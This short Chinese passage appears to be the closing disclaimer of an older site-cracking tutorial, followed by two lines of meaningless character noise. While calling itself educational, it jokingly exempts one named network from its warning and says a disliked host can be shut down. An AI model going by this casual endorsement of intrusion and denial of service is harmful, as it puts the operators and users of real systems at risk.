再次重申, Crack 別人站臺(tái)之後不要破壞別人站臺(tái)中的資料, 此篇文章僅作為教育目的,不主張你隨便入侵他人主機(jī).... (高-Net 還是除外)... 請(qǐng)勿將這類技術(shù)使用於破壞上 (又...如果第三次世界大戰(zhàn)開打, 你可以任意破壞敵國(guó)的電腦網(wǎng)路... 我全力支持),最嚴(yán)重的情況(如果你真的很討厭該主機(jī)的話)... 就將它 Shut Down.... 好了! 別太暴力了!
! t& ?7 G2 @) `+ R/ G6 m
6 \) t% l+ ?9 s' U$ P% j$ p8 x